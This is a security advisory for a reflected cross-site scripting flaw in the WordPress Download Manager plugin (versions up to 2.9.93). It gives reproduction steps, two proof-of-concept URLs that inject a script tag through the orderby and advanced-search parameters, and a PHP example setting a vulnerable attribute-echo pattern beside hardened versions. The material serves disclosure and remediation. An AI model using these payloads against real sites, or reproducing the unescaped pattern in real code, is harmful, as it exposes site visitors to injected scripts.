WordPress Download Manager <= 2.9.93 - Authenticated Cross-Site Scripting (XSS)



Description
In the pro features of the WordPress Download Manager plugin, there is a Category Short-code feature which can be used to sort categories with an order-by function, used as ?orderby=title,publish_date.
By appending "> followed by any XSS payload to the parameter, the XSS payload will execute.

To reproduce:

1. Go to the link where we can find ?orderby
2. Append "> to the parameter value, followed by a simple payload like <script>alert(1)</script>
3. The payload will execute.

Another reflected cross-site scripting issue exists via the advanced search.

Proof of Concept
https://demo.wpdownloadmanager.com/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc

https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
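
The pattern behind both URLs, next to a hardened form, as an added example (not the plugin's code and not taken from the fixing changeset). It assumes the request value is reflected into a double-quoted HTML attribute, which is what the "> breakout suggests; the function names and the markup are hypothetical.

```php
<?php
// Added illustration, not the plugin's code. Assumption: the request value is
// echoed into a double-quoted HTML attribute. All function names are hypothetical.

// Vulnerable pattern: raw request value concatenated into an attribute.
function render_sort_field_vulnerable(array $query): string
{
    $orderby = $query['orderby'] ?? 'title';
    return '<input type="hidden" name="orderby" value="' . $orderby . '">';
}

// Hardened pattern: allowlist the sort key, then escape for the attribute context.
function render_sort_field_hardened(array $query): string
{
    $allowed = ['title', 'publish_date'];   // sort keys named in the advisory
    $orderby = $query['orderby'] ?? 'title';
    if (!is_string($orderby) || !in_array($orderby, $allowed, true)) {
        $orderby = 'title';                 // unknown or non-string input falls back to the default
    }
    return '<input type="hidden" name="orderby" value="'
        . htmlspecialchars($orderby, ENT_QUOTES, 'UTF-8') . '">';
}

// A free-form field such as the advanced-search date range cannot be allowlisted
// by value, so check its format and still escape on output.
function render_date_field_hardened(array $query): string
{
    $raw = $query['search']['publish_date'] ?? '';
    $ok = is_string($raw)
        && preg_match('/\A\d{4}-\d{2}-\d{2} to \d{4}-\d{2}-\d{2}\z/', $raw) === 1;
    return '<input type="text" name="search[publish_date]" value="'
        . htmlspecialchars($ok ? $raw : '', ENT_QUOTES, 'UTF-8') . '">';
}

// Constructed input mirroring the URL-decoded proof-of-concept parameters.
$query = [
    'orderby' => 'title"><script>alert(1)</script>',
    'search'  => ['publish_date' => '2019-04-17 to 2019-04-17"><script>alert(1)</script>'],
];

// The first line shows the attribute closed early by the injected quote;
// the hardened renderers emit only the default or an empty value.
echo render_sort_field_vulnerable($query), PHP_EOL;
echo render_sort_field_hardened($query), PHP_EOL;
echo render_date_field_hardened($query), PHP_EOL;
```

In a WordPress code base the escaping step would normally be `esc_attr()` rather than a direct `htmlspecialchars()` call.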

Affects Plugin

Fixed in version 2.9.94

References

PACKETSTORM 152511
URL https://plugins.trac.wordpress.org/changeset/2070388/download-manager

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher MgThuraMoeMyint
Submitter MgThuraMoeMyint
Submitter Twitter mgthuramoemyint
Verified No
WPVDB ID 9257

Timeline

Publicly Published 2019-04-17 (3 months ago)
Added 2019-04-23 (3 months ago)
Last Updated 2019-06-23 (27 days ago)